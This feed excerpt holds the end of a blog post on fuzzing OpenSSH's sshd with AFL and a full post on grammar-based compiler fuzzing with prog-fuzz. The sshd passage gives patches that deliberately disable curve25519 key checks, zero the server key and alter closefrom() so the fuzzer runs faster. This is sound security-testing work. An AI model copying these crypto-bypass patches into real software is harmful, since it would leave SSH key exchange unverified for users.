fuzzer. Poke &lt;lcamtuf@coredump.cx&gt; for troubleshooting tips.</code></pre><p>So there is obviously some AFL magic code here to make the fuzzer and the fuzzed program communicate. After poking around in <code>afl-fuzz.c</code>, I found <code>FORKSRV_FD</code>, which is a file descriptor pointing to a pipe used for this purpose. The value is 198 (and the other end of the pipe is 199).</p><p>To try to figure out what was going wrong, I ran <code>afl-fuzz</code> under strace, and it showed that file descriptors 198 and 199 were getting closed by sshd. With some more digging, I found the call to <code>closefrom()</code>, which is a function that closes all inherited (and presumed unused) file descriptors starting at a given number. Again, the reason for this code to exist in the first place is probably in order to reduce the attack surface in case an attacker is able to gain control the process. Anyway, the solution is to protect these special file descriptors using a patch like this:</p><pre><code>diff --git openbsd-compat/bsd-closefrom.c openbsd-compat/bsd-closefrom.c
--- openbsd-compat/bsd-closefrom.c
+++ openbsd-compat/bsd-closefrom.c
@@ -81,7 +81,7 @@ closefrom(int lowfd)
        while ((dent = readdir(dirp)) != NULL) {
            fd = strtol(dent-&gt;d_name, &amp;endp, 10);
            if (dent-&gt;d_name != endp &amp;&amp; *endp == '\0' &amp;&amp;
-               fd &gt;= 0 &amp;&amp; fd &lt; INT_MAX &amp;&amp; fd &gt;= lowfd &amp;&amp; fd != dirfd(dirp))
+               fd &gt;= 0 &amp;&amp; fd &lt; INT_MAX &amp;&amp; fd &gt;= lowfd &amp;&amp; fd != dirfd(dirp) &amp;&amp; fd != 198 &amp;&amp; fd != 199)
                (void) close((int) fd);
        }
        (void) closedir(dirp);</code></pre><h3>Skipping expensive DH/curve and key derivation operations</h3><p>At this point, I still wasn’t happy with the execution speed: Some testcases were as low as 10 execs/second, which is really slow.</p><p>I tried compiling sshd with <code>-pg</code> (for gprof) to try to figure out where the time was going, but there are many obstacles to getting this to work properly: First of all, sshd exits using <code>_exit(255)</code> through its <code>cleanup_exit()</code> function. This is not a “normal” exit and so the <code>gmon.out</code> file (containing the profile data) is not written out at all. Applying a source patch to fix that, sshd will give you a “Permission denied” error as it tries to open the file for writing. The problem now is that sshd does a <code>chdir("/")</code>, meaning that it’s trying to write the profile data in a directory where it doesn’t have access. The solution is again simple, just add another <code>chdir()</code> to a writable location before calling <code>exit()</code>. Even with this in place, the profile came out completely empty for me. Maybe it’s another one of those privilege separation things. In any case, I decided to just use valgrind and its “cachegrind” tool to obtain the profile. It’s much easier and gives me the data I need without hassles of reconfiguring, patching, and recompiling.</p><p>The profile showed one very specific hot spot, coming from two different locations: elliptic curve point multiplication.</p><p>I don’t really know too much about elliptic curve cryptography, but apparently it’s pretty expensive to calculate. However, we don’t really need to deal with it; we can assume that the key exchange between the server and the client succeeds. Similar to how we increased coverage above by skipping message CRC checks and replacing the encryption with a dummy cipher, we can simply skip the expensive operations and assume they always succeed. This is a trade-off; we are no longer fuzzing all the verification steps, but allows the fuzzer to concentrate more on the protocol parsing itself. I applied this patch:</p><pre><code>diff --git kexc25519.c kexc25519.c
--- kexc25519.c
+++ kexc25519.c
@@ -68,10 +68,13 @@ kexc25519_shared_key(const u_char key[CURVE25519_SIZE],
 
        /* Check for all-zero public key */
        explicit_bzero(shared_key, CURVE25519_SIZE);
+#if 0
        if (timingsafe_bcmp(pub, shared_key, CURVE25519_SIZE) == 0)
                return SSH_ERR_KEY_INVALID_EC_VALUE;
 
        crypto_scalarmult_curve25519(shared_key, key, pub);
+#endif
+
 #ifdef DEBUG_KEXECDH
        dump_digest("shared secret", shared_key, CURVE25519_SIZE);
 #endif
diff --git kexc25519s.c kexc25519s.c
--- kexc25519s.c
+++ kexc25519s.c
@@ -67,7 +67,12 @@ input_kex_c25519_init(int type, u_int32_t seq, void *ctxt)
        int r;
 
        /* generate private key */
+#if 0
        kexc25519_keygen(server_key, server_pubkey);
+#else
+       explicit_bzero(server_key, sizeof(server_key));
+       explicit_bzero(server_pubkey, sizeof(server_pubkey));
+#endif
 #ifdef DEBUG_KEXECDH
        dump_digest("server private key:", server_key, sizeof(server_key));
 #endif</code></pre><p>With this patch in place, execs/second went to ~2,000 per core, which is a much better speed to be fuzzing at.</p><p>(<strong>EDIT 2017-03-25</strong>: As it turns out, this patch is not very good, because it causes a later key validity check to fail (<code>dh_pub_is_valid()</code> in <code>input_kex_dh_init()</code>). We could perhaps make <code>dh_pub_is_valid()</code> always return true, but then there is a question of whether this in turn makes something else fail down the line.)</p><h2>Creating the first input testcases</h2><p>Before we can start fuzzing for real, we have to create the first few input testcases. Actually, a single one is enough to get started, but if you know how to create different ones taking different code paths in the server, that may help jumpstart the fuzzing process. A few possibilities I can think of:</p><ul><li><code>ssh -A</code> for ssh agent forwarding</li>
<li><code>ssh -R</code> to enable arbitrary port forwarding</li>
<li><code>ssh -Y</code> to enable X11 forwarding</li>
<li><code>scp</code> to transfer a file</li>
<li>password vs. pubkey authentication</li>
</ul><p>The way I created the first testcase was to record the traffic from the client to the server using strace. Start the server without <code>-i</code>:</p><pre><code>./sshd -d -e -p 2200 -r -f sshd_config
[...]
Server listening on :: port 2200.</code></pre><p>Then start a client (using the <code>ssh</code> binary you’ve just compiled) under strace:</p><pre><code>$ strace -e trace=write -o strace.log -f -s 8192 ./ssh -c none -p 2200 localhost</code></pre><p>This should hopefully log you in (if not, you may have to fiddle with users, keys, and passwords until you succeed in logging in to the server you just started).</p><p>The first few lines of the strace log should read something like this:</p><pre><code>2945  write(3, "SSH-2.0-OpenSSH_7.4\r\n", 21) = 21
2945  write(3, "\0\0\4|\5\24\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0010curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c\0\0\1\"ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521-cert-v01@openssh.com,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519-cert-v01@openssh.com,ssh-rsa-cert-v01@openssh.com,ssh-ed25519,rsa-sha2-512,rsa-sha2-256,ssh-rsa\0\0\0\4none\0\0\0\4none\0\0\0\325umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1\0\0\0\325umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1\0\0\0\32none,zlib@openssh.com,zlib\0\0\0\32none,zlib@openssh.com,zlib\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 1152) = 1152</code></pre><p>We see here that the client is communicating over file descriptor 3. You will have to delete all the writes happening on other file descriptors. Then take the strings and paste them into a Python script, something like:</p><pre><code>import sys
for x in [
    "SSH-2.0-OpenSSH_7.4\r\n"
    "\0\0\4..."
    ...
]:
    sys.stdout.write(x)</code></pre><p>When you run this, it will print a byte-perfect copy of everything that the client sent to stdout. Just redirect this to a file. That file will be your first input testcase.</p><p>You can do a test run (without AFL) by passing the same data to the server again (this time using <code>-i</code>):</p><pre><code>./sshd -d -e -p 2200 -r -f sshd_config -i &lt; testcase 2&gt;&amp;1 &gt; /dev/null</code></pre><p>Hopefully it will show that your testcase replay was able to log in successfully.</p><p>Before starting the fuzzer you can also double check that the instrumentation works as expected using afl-analyze:</p><pre><code>~/afl-2.39b/afl-analyze -i testcase -- ./sshd -d -e -p 2200 -r -f sshd_config -i</code></pre><p>This may take a few seconds to run, but should eventually show you a map of the file and what it thinks each byte means. If there is too much red, that’s an indication you were not able to disable checksumming/encryption properly (maybe you have to <code>make clean</code> and rebuild?). You may also see other errors, including that AFL didn’t detect any instrumentation (did you compile sshd with <code>afl-clang-fast</code>?). This is general AFL troubleshooting territory, so I’d recommend checking out the AFL documentation.</p><h2>Creating an OpenSSH dictionary</h2><p>I created an AFL “dictionary” for OpenSSH, which is basically just a list of strings with special meaning to the program being fuzzed. I just used a few of the strings found by running <code>ssh -Q cipher</code>, etc. to allow the fuzzer to use these strings without having to discover them all at once (which is pretty unlikely to happen by chance).</p><pre><code>s0="3des-cbc"
s1="aes128-cbc"
s2="aes128-ctr"
s3="aes128-gcm@openssh.com"
s4="aes192-cbc"
s5="aes192-ctr"
s6="aes256-cbc"
s7="aes256-ctr"
s8="aes256-gcm@openssh.com"
s9="arcfour"
s10="arcfour128"
s11="arcfour256"
s12="blowfish-cbc"
s13="cast128-cbc"
s14="chacha20-poly1305@openssh.com"
s15="curve25519-sha256@libssh.org"
s16="diffie-hellman-group14-sha1"
s17="diffie-hellman-group1-sha1"
s18="diffie-hellman-group-exchange-sha1"
s19="diffie-hellman-group-exchange-sha256"
s20="ecdh-sha2-nistp256"
s21="ecdh-sha2-nistp384"
s22="ecdh-sha2-nistp521"
s23="ecdsa-sha2-nistp256"
s24="ecdsa-sha2-nistp256-cert-v01@openssh.com"
s25="ecdsa-sha2-nistp384"
s26="ecdsa-sha2-nistp384-cert-v01@openssh.com"
s27="ecdsa-sha2-nistp521"
s28="ecdsa-sha2-nistp521-cert-v01@openssh.com"
s29="hmac-md5"
s30="hmac-md5-96"
s31="hmac-md5-96-etm@openssh.com"
s32="hmac-md5-etm@openssh.com"
s33="hmac-ripemd160"
s34="hmac-ripemd160-etm@openssh.com"
s35="hmac-ripemd160@openssh.com"
s36="hmac-sha1"
s37="hmac-sha1-96"
s38="hmac-sha1-96-etm@openssh.com"
s39="hmac-sha1-etm@openssh.com"
s40="hmac-sha2-256"
s41="hmac-sha2-256-etm@openssh.com"
s42="hmac-sha2-512"
s43="hmac-sha2-512-etm@openssh.com"
s44="rijndael-cbc@lysator.liu.se"
s45="ssh-dss"
s46="ssh-dss-cert-v01@openssh.com"
s47="ssh-ed25519"
s48="ssh-ed25519-cert-v01@openssh.com"
s49="ssh-rsa"
s50="ssh-rsa-cert-v01@openssh.com"
s51="umac-128-etm@openssh.com"
s52="umac-128@openssh.com"
s53="umac-64-etm@openssh.com"
s54="umac-64@openssh.com"</code></pre><p>Just save it as <code>openssh.dict</code>; to use it, we will pass the filename to the <code>-x</code> option of <code>afl-fuzz</code>.</p><h2>Running AFL</h2><p>Whew, it’s finally time to start the fuzzing!</p><p>First, create two directories, <code>input</code> and <code>output</code>. Place your initial testcase in the <code>input</code> directory. Then, for the output directory, we’re going to use a little hack that I’ve found to speed up the fuzzing process and keep AFL from hitting the disk all the time: mount a tmpfs RAM-disk on <code>output</code> with:</p><pre><code>sudo mount -t tmpfs none output/</code></pre><p>Of course, if you shut down (or crash) your machine without copying the data out of this directory, it will be gone, so you should make a backup of it every once in a while. I personally just use a bash one-liner that just tars it up to the real on-disk filesystem every few hours.</p><p>To start a single fuzzer, you can use something like:</p><pre><code>~/afl-2.39b/afl-fuzz -x sshd.dict -i input -o output -M 0 -- ./sshd -d -e -p 2100 -r -f sshd_config -i</code></pre><p>Again, see the AFL docs on how to do parallel fuzzing. I have a simple bash script that just launches a bunch of the line above (with different values to the <code>-M</code> or <code>-S</code> option) in different screen windows.</p><p>Hopefully you should see something like this:</p><pre><code>                         american fuzzy lop 2.39b (31)

┌─ process timing ─────────────────────────────────────┬─ overall results ─────┐
│        run time : 0 days, 13 hrs, 22 min, 40 sec     │  cycles done : 152    │
│   last new path : 0 days, 0 hrs, 14 min, 57 sec      │  total paths : 1577   │
│ last uniq crash : none seen yet                      │ uniq crashes : 0      │
│  last uniq hang : none seen yet                      │   uniq hangs : 0      │
├─ cycle progress ────────────────────┬─ map coverage ─┴───────────────────────┤
│  now processing : 717* (45.47%)     │    map density : 3.98% / 6.67%         │
│ paths timed out : 0 (0.00%)         │ count coverage : 3.80 bits/tuple       │
├─ stage progress ────────────────────┼─ findings in depth ────────────────────┤
│  now trying : splice 4              │ favored paths : 117 (7.42%)            │
│ stage execs : 74/128 (57.81%)       │  new edges on : 178 (11.29%)           │
│ total execs : 74.3M                 │ total crashes : 0 (0 unique)           │
│  exec speed : 1888/sec              │   total hangs : 0 (0 unique)           │
├─ fuzzing strategy yields ───────────┴───────────────┬─ path geometry ────────┤
│   bit flips : n/a, n/a, n/a                         │    levels : 7          │
│  byte flips : n/a, n/a, n/a                         │   pending : 2          │
│ arithmetics : n/a, n/a, n/a                         │  pend fav : 0          │
│  known ints : n/a, n/a, n/a                         │ own finds : 59         │
│  dictionary : n/a, n/a, n/a                         │  imported : 245        │
│       havoc : 39/25.3M, 20/47.2M                    │ stability : 97.55%     │
│        trim : 2.81%/1.84M, n/a                      ├────────────────────────┘
└─────────────────────────────────────────────────────┘          [cpu015: 62%]</code></pre><h2>Crashes found</h2><p>In about a day of fuzzing (even before disabling encryption), I found a couple of NULL pointer dereferences during key exchange. Fortunately, these crashes are not harmful in practice because of OpenSSH’s privilege separation code, so at most we’re crashing an unprivileged child process and leaving a scary segfault message in the system log. The fix made it in CVS here: <a href="http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/kex.c?rev=1.131&amp;content-type=text/x-cvsweb-markup" class="uri">http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/kex.c?rev=1.131&amp;content-type=text/x-cvsweb-markup</a>.</p><h2>Conclusion</h2><p>Apart from the two harmless NULL pointer dereferences I found, I haven’t been able to find anything else yet, which seems to indicate that OpenSSH is fairly robust (which is good!).</p><p>I hope some of the techniques and patches I used here will help more people get into fuzzing OpenSSH.</p><p>Other things to do from here include doing some fuzzing rounds using ASAN or running the corpus through valgrind, although it’s probably easier to do this once you already have a good sized corpus found without them, as both ASAN and valgrind have a performance penalty.</p><p>It could also be useful to look into <code>./configure</code> options to configure the build more like a typical distro build; I haven’t done anything here except to get it to build in a minimal environment.</p><p>Please let me know in the comments if you have other ideas on how to expand coverage or make fuzzing OpenSSH faster!</p><h2>Thanks</h2><p>I’d like to thank Oracle (my employer) for providing the hardware on which to run lots of AFL instances in parallel :-)</p><div class="footnotes"><hr><ol><li><p>Well, we can’t fix up signatures we don’t have the private key for, so in those cases we’ll just assume the attacker does have the private key. You can still do damage e.g. in an otherwise locked down environment; as an example, GitHub uses the SSH protocol to allow pushing to your repositories. These SSH accounts are heavily locked down, as you can’t run arbitrary commands on them. In this case, however, we do have have the secret key used to authenticate and sign messages.<a href="http://www.vegardno.net/2017/03/fuzzing-openssh-daemon-using-afl.html#fnref1">↩</a></p></li>
</ol></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Compiler fuzzing, part 1]]></title>
<description><![CDATA[Much has been written about fuzzing compilers already, but there is not a lot that I could find about fuzzing compilers using more modern fuzzing techniques where coverage information is fed back into the fuzzer to find more bugs.

If you know me at all, you know I'll throw anything I can get my ...]]></description>
<link>https://tsecurity.de/de/3500678/unix-server/compiler-fuzzing-part-1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3500678/unix-server/compiler-fuzzing-part-1/</guid>
<pubDate>Fri, 08 May 2026 22:51:58 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>
</h1>
Much has been written about fuzzing compilers already, but there is not a lot that I could find about fuzzing compilers using more modern fuzzing techniques where coverage information is fed back into the fuzzer to find more bugs.<br>
<br>
If you know me at all, you know I'll throw anything I can get my hands on at AFL. So I tried gcc. (And clang, and rustc -- but more about Rust in a later post.)<br>
<br>
<h3>
Levels of fuzzing</h3>
<br>
First let me summarise a post by John Regehr called <a href="https://blog.regehr.org/archives/1039">Levels of Fuzzing</a>, which my approach builds heavily on. Regehr presents a very important idea (which stems from earlier research/papers by others), namely that fuzzing can operate at different "levels". These levels correspond somewhat loosely to the different stages of compilation, i.e. lexing, parsing, type checking, code generation, and optimisation. In terms of fuzzing, the source code that you pass to the compiler has to "pass" one stage before it can enter the next; if you give the compiler a completely random binary file, it is unlikely to even get past the lexing stage, never mind to the point where the compiler is actually generating code. So it is in our interest (assuming we want to fuzz more than just the lexer) to generate test cases more intelligently than just using random binary data.<br>
<br>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container"><tbody>
<tr><td><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIXZ2MXcQ96h8mtq76NyjySjb6I6GGg47O73eLT9FyA8wfPrP5b7bBnlmgkwkwRMcxnUawsLyYvDaS9qtxtApeOVyBysogm-ZGkrTrmD5oQTQYiJYhuS5zFXKwdvpp1AeD31AHzk1HMa0/s1600/urandom.c.png" imageanchor="1"><img border="0" data-original-height="157" data-original-width="435" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIXZ2MXcQ96h8mtq76NyjySjb6I6GGg47O73eLT9FyA8wfPrP5b7bBnlmgkwkwRMcxnUawsLyYvDaS9qtxtApeOVyBysogm-ZGkrTrmD5oQTQYiJYhuS5zFXKwdvpp1AeD31AHzk1HMa0/s1600/urandom.c.png"></a></td></tr>
<tr><td class="tr-caption">If we simply try to compile random data, we're not going to get very far.</td></tr>
</tbody></table>
  <br>
In a "naïve" approach, we simply compile gcc with AFL instrumentation and run afl-fuzz on it as usual. If we give a reasonable corpus of existing C code, it is possible that the fuzzer will find something interesting by randomly mutating the test cases. But more likely than not, it is mostly going to end up with random garbage like what we see above, and never actually progress to more interesting stages of compilation. I did try this -- and the results were as expected. It takes a long time before the fuzzer hits anything interesting at all. Now, <a href="http://lists.llvm.org/pipermail/llvm-dev/2014-December/079390.html">Sami Liedes did this with clang back in 2014</a> and obtained some impressive results ("34 distinct assertion failures in the first 11 hours"). So clearly it was possible to find bugs in this way. When I tried this myself for GCC, I did not find a single crash within a day or so of fuzzing. And looking at the queue of distinct testcases it had found, it was very clear that it was merely scratching the very outermost surface of the input handling in the compiler -- it was not able to produce a single program that would make it past the parsing stage.<br>
<br>
AFL has a few built-in mutation strategies: bit flips, "byte flips", arithmetic on bytes, 2-bytes, and 4-bytes, insertion of common boundary values (like 0, 1, powers of 2, -1, etc.), insertions of and substitution by "dictionary strings" (basically user-provided lists of strings), along with random splicing of test cases. We can already sort of guess that most of these strategies will not be useful for C and C++ source code. Perhaps the "dictionary strings" is the most promising for source code as it allows you to insert keywords and snippets of code that have at least some chance of ending up as a valid program. For the other strategies, single bit flips can change variable names, but changing variable names is not that interesting unless you change one variable into another (which both have to exist, as otherwise you would hit a trivial "undeclared" error). They can also create expressions, but if you somehow managed to change a 'h' into a '(', source code with this mutation would always fail unless you also inserted a ')' somewhere else to balance the expression. Source code has a lot of these "correspondances" where changing one thing also requires changing another thing somewhere else in the program if you want it to still compile (even though you don't generate an equivalent program -- that's not what we're trying to do here). Variable uses match up with variable declarations. Parantheses, braces, and brackets must all match up (and in the right order too!).<br>
<br>
These "correspondences" remind me a lot of CRCs and checksums in other file formats, and they give the fuzzer problems for the exact same reason: without extra code it's hard to overcome having to change the test case simultaneously in two or more places, never mind making the exact change that will preserve the relationship between these two values. It's a game of combinatorics; the more things we have to change at once and the more possibilities we have for those changes, the harder it will be to get that exact combination when you're working completely at random. For checksums the answer is easy, and there are two very good strategies: either you disable the checksum verification in the code you're fuzzing, or you write a small wrapper to "fix up" your test case so that the checksum always matches the data it protects (of course, after mutating an input you may not really know where in the file the checksum will be located anymore, but that's a different problem).<br>
<br>
For C and C++ source code it's not so obvious how to help the fuzzer overcome this. You can of course generate programs with a grammar (and some heuristics), which is what several C random code generators such as <a href="https://embed.cs.utah.edu/csmith/">Csmith</a>, <a href="https://github.com/Mrktn/ccg">ccg</a>, and <a href="https://github.com/intel/yarpgen">yarpgen</a> do. This is in a sense on the completely opposite side of the spectrum when it comes to the levels of fuzzing. By generating programs that you know are completely valid (and correct, and free of undefined behaviour), you will breeze through the lexing, the parsing, and the type checking and target the code generation and optimization stages. This is what Regehr et al. did in <a href="https://dl.acm.org/citation.cfm?id=2462173">"Taming compiler fuzzers"</a>, another very interesting read. (Their approach does not include instrumentation feedback, however, so it is more of a traditional black-box fuzzing approach than AFL, which is considered <a href="https://dl.acm.org/citation.cfm?id=2978428">grey-box fuzzing</a>.)<br>
<br>
But if you use a C++ grammar to generate C++ programs, that will also exclude a lot of inputs that are not valid but nevertheless accepted by the compiler. This approach relies on our ability to express all programs that <i>should</i> be valid, but there may also be programs non-valid programs that crash the compiler. As an example, if our generator knows that you cannot add an integer to a function, or assign a value to a constant, then the code paths checking for those conditions in the compiler would never be exercised, despite the fact that those errors are more interesting than mere syntax errors. In other words, there is a whole range of "interesting" test cases which we will never be able to generate if we restrict ourselves only to those programs that are actually valid code.<br>
<br>
Please note that I am not saying that one approach is better than the other! I believe we need all of them to successfully find bugs in all the areas of the compiler. By realising exactly what the limits of each method are, we can try to find other ways to fill the gaps.<br>
<br>
<h3>
Fuzzing with a loose grammar</h3>
<br>
So how can we fill the gap between the shallow syntax errors in the front end and the very deep of the code generation in the back end? There are several things we can do.<br>
<br>
The main feature of my solution is to use a "loose" grammar. As opposed to a "strict" grammar which would follow the C/C++ specs to the dot, the loose grammar only really has one type of symbol, and all the production rules in the grammar create this type of symbol. As a simple example, a traditional C grammar will not allow you to put a statement where an expression is expected, whereas the loose grammar has no restrictions on that. It does, however, take care that your parantheses and braces match up. My grammar file therefore looks something like this (also see <a href="https://github.com/vegard/prog-fuzz/blob/master/rules/cxx.txt">the full grammar</a> if you're curious!):<br>
<pre><code>"[void] [f] []([]) { [] }"
"[]; []"
"{ [] }"
"[0] + [0]"
...</code></pre>
Here, anything between "[" and "]" (call it a placeholder) can be substituted by any other line from the grammar file. An evolution of a program could therefore plausibly look like this:<br>
<pre><code>void f () { }           // using the "[void] [f] []([]) { [] }" rule
void f () { ; }         // using the "[]; []" rule
void f () { 0 + 0; }    // using the "[0] + [0]" rule
void f ({ }) { 0 + 0; } // using the "{ [] }" rule
...</code></pre>
Wait, what happened at the end there? That's not valid C. No -- but it could still be an interesting thing to try to pass to the compiler. We did have a placeholder where the arguments usually go, and according to the grammar we can put any of the other rules in there. This does quickly generate a lot of nonsensical programs that stop the compiler completely dead in its track at the parsing stage. We do have another trick to help things along, though...<br>
<br>
AFL doesn't care at all whether what we pass it is accepted by the compiler or not; it doesn't distinguish between success and failure, only between graceful termination and crashes. However, all we have to do is teach the fuzzer about the difference between exit codes 0 and 1; a 0 means the program passed all of gcc's checks and actually resulted in an object file. Then we can discard all the test cases that result in an error, and keep a corpus of test cases which compile successfully. It's really a no-brainer, but makes such a big difference in what the fuzzer can generate/find.<br>
<br>
<h3>
Enter prog-fuzz</h3>
<div>
<br></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container"><tbody>
<tr><td><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXJuF_rDhKvBrIkgzujwx8ljo-XHPeVIMm5eglkmnLgJsIjVOWzYeOPCv1DVrPjXrEv4jUzIWjwbxgyI10o-CS_tNJfDGeTZd5CqZb-epY2515d_m0OFHGjr95E523c6aEj2jAZlT-2lc/s1600/prog-fuzz.png" imageanchor="1"><img border="0" data-original-height="315" data-original-width="670" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXJuF_rDhKvBrIkgzujwx8ljo-XHPeVIMm5eglkmnLgJsIjVOWzYeOPCv1DVrPjXrEv4jUzIWjwbxgyI10o-CS_tNJfDGeTZd5CqZb-epY2515d_m0OFHGjr95E523c6aEj2jAZlT-2lc/s1600/prog-fuzz.png"></a></td></tr>
<tr><td class="tr-caption">prog-fuzz output</td></tr>
</tbody></table>
<br>
<br>
If it's not clear by now, I'm not using afl-fuzz to drive the main fuzzing process for the techniques above. I decided it was easier to write a fuzzer from scratch, just reusing the AFL instrumentation and some of the setup code to collect the coverage information. Without the fork server, it's surprisingly little code, on the order of 15-20 lines of code! (I do have support for the fork server on a different branch and it's not THAT much harder to implement, but I simply haven't gotten around to it yet; and it also wasn't <i>really</i> needed to find a lot of bugs).<br>
<br>
You can find prog-fuzz on GitHub: <a href="https://github.com/vegard/prog-fuzz">https://github.com/vegard/prog-fuzz</a><br>
<br>
The code is not particularly clean, it's a hacked-up fuzzer that gets the job done. I'll want to clean that up at some point, document all the steps to build gcc with AFL instrumentation, etc., and merge a proper fork server. I just want the code to be out there in case somebody else wants to have a poke around.<br>
<br>
<h3>
Results</h3>
<br>
From the end of February until some time in April I ran the fuzzer on and off and reported just over 100 distinct gcc bugs in total (32 of them fixed so far, by my count):<br>
<ul>
<li><a href="https://gcc.gnu.org/bugzilla/buglist.cgi?reporter=vegard.nossum%40gmail.com">https://gcc.gnu.org/bugzilla/buglist.cgi?reporter=vegard.nossum%40gmail.com</a></li>
<li><a href="https://gcc.gnu.org/bugzilla/buglist.cgi?reporter=vegard.nossum%40oracle.com">https://gcc.gnu.org/bugzilla/buglist.cgi?reporter=vegard.nossum%40oracle.com</a></li>
</ul>
Now, there are a few things to be said about these bugs.<br>
<br>
First, these bugs are mostly crashes: internal compiler errors ("ICEs"), assertion failures, and segfaults. Compiler crashes are usually not very high priority bugs -- especially when you are dealing with invalid programs. Most of the crashes would never occur "naturally" (i.e. as the result of a programmer trying to write some program). They represent very specific edge cases that may not be important at all in normal usage. So I am under no delusions about the relative importance of these bugs; a compiler crash is hardly a security risk.<br>
<br>
However, I still think there is value in fuzzing compilers. Personally I find it very interesting that the same technique on rustc, the Rust compiler, only found <a href="https://github.com/rust-lang/rust/issues?q=author%3Avegard">8 bugs</a> in a couple of weeks of fuzzing, and not a single one of them was an actual segfault. I think it does say something about the nature of the code base, code quality, and the relative dangers of different programming languages, in case it was not clear already. In addition, compilers (and compiler writers) should have these fuzz testing techniques available to them, because it clearly finds bugs. Some of these bugs also point to underlying weaknesses or to general cases where something really could go wrong in a real program. In all, knowing about the bugs, even if they are relatively unimportant, will not hurt us.<br>
<br>
Second, I should also note that I did have conversations with the gcc devs while fuzzing. I asked if I should open new bugs or attach more test cases to existing reports if I thought the area of the crash looked similar, even if it wasn't the exact same stack trace, etc., and they always told me to file a new report. In fact, I would like to praise the gcc developer community: I have never had such a pleasant bug-reporting experience. Within a day of reporting a new bug, somebody (usually Martin Liška or Marek Polacek) would run the test case and mark the bug as confirmed as well as bisect it using their huge library of precompiled gcc binaries to find the exact revision where the bug was introduced. This is something that I think all projects should strive to do -- the small feedback of having somebody acknowledge the bug is a huge encouragement to continue the process. Other gcc developers were also very active on IRC and answered almost all my questions, ranging from silly "Is this undefined behaviour?" to "Is this worth reporting?". In summary, I have nothing but praise for the gcc community.<br>
<br>
I should also add that I played briefly with LLVM/clang, and prog-fuzz found 9 new bugs (2 of them fixed so far):<br>
<ul>
<li><a href="https://bugs.llvm.org/buglist.cgi?reporter=vegard.nossum%40gmail.com">https://bugs.llvm.org/buglist.cgi?reporter=vegard.nossum%40gmail.com</a></li>
</ul>
In addition to those, I also found a few other bugs that had already been reported by Sami Liedes back in 2014 which remain unfixed.<br>
<br>
For rustc, I will write a more detailed blog post about how to set it up, as compiling rustc itself with AFL instrumentation is non-trivial and it makes more sense to detail those exact steps apart from this post.<br>
<br>
<h3>
What next?</h3>
<br>
I mentioned the efforts by Regehr et al. and Dmitry Babokin et al. on Csmith and yarpgen, respectively, as fuzzers that generate valid (UB-free) C/C++ programs for finding code generation bugs. I think there is work to be done here to find more code generation bugs; as far as I can tell, nobody has yet combined instrumentation feedback (grey-box fuzzing) with this kind of test case generator. Well, <a href="https://github.com/vegard/prog-fuzz/blob/master/main-valid.cc">I tried to do it</a>, but it requires a lot of effort to generate valid programs that are also interesting, and I stopped before finding any actual bugs. But I really think this is the future of compiler fuzzing, and I will outline the ideas that I think will have to go into it:<br>
<ul>
<li>iterative program generation with instrumentation feedback: As opposed to generating one huge program and hoping that it will tickle some interesting path in the compiler you start with a valid program and you apply transformation rules that will gradually introduce complexity in the program. This allows you to use instrumentation feedback to tell exactly which transformations are valuable in terms of new code paths taken, and will give you a corpus of interesting test cases as well as speeding up the full generate/compile/test cycle.</li>
<li>have the program perform a calculation with a known result: Instead of compiling the same program with two different compilers or configurations and checking that the resulting binary outputs the same thing (which is what Regehr et al. did in "Taming compiler fuzzers"), we can test one compiler/configuration at a time and simply check that the output matches the known solution. </li>
</ul>
I don't have the time to continue working on this at the moment, but please do let me know if you would like to give it a try and I'll do my best to answer any questions about the code or the approach.<br>
<br>
<h3>
Acknowledgements</h3>
<br>
Thanks to John Regehr, Martin Liška, Marek Polacek, Jakub Jelinek, Richard Guenther, David Malcolm, Segher Boessenkool, and Martin Jambor for responding to my questions and bug reports!<br>
<br>
Thanks to my employer, Oracle, for allowing me to do part of this fuzzing effort using company time and resources.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple TV releases trailer for ‘Cape Fear’ limited series starring Amy Adams, Javier Bardem, and Patrick Wilson]]></title>
<description><![CDATA[Apple TV has unveiled the trailer for “Cape Fear,” the new psychological horror thriller showrun and executive produced by Nick Antosca…
The post Apple TV releases trailer for ‘Cape Fear’ limited series starring Amy Adams, Javier Bardem, and Patrick Wilson appeared first on MacDailyNews.]]></description>
<link>https://tsecurity.de/de/3499848/ios-mac-os/apple-tv-releases-trailer-for-cape-fear-limited-series-starring-amy-adams-javier-bardem-and-patrick-wilson/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3499848/ios-mac-os/apple-tv-releases-trailer-for-cape-fear-limited-series-starring-amy-adams-javier-bardem-and-patrick-wilson/</guid>
